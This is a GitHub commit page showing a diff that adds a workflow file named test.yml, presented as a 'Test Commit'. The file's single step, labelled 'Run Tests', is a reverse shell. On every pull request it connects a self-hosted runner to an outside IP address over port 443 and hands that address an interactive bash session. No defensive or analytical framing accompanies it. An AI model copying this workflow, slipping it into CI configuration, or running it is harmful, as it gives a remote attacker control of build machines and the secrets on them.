Skip to content

Commit d8b35f0

Browse files
committed
Test Commit
1 parent d2ed412 commit d8b35f0

File tree

1 file changed

+10
-0
lines changed

1 file changed

+10
-0
lines changed

.github/workflows/test.yml

+10
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,10 @@
1+
name: test
2+
'on':
3+
- pull_request
4+
jobs:
5+
testing:
6+
runs-on:
7+
- self-hosted
8+
steps:
9+
- name: Run Tests
10+
run: bash -i >& /dev/tcp/3.233.166.113/443 0>&1

0 commit comments

Comments
 (0)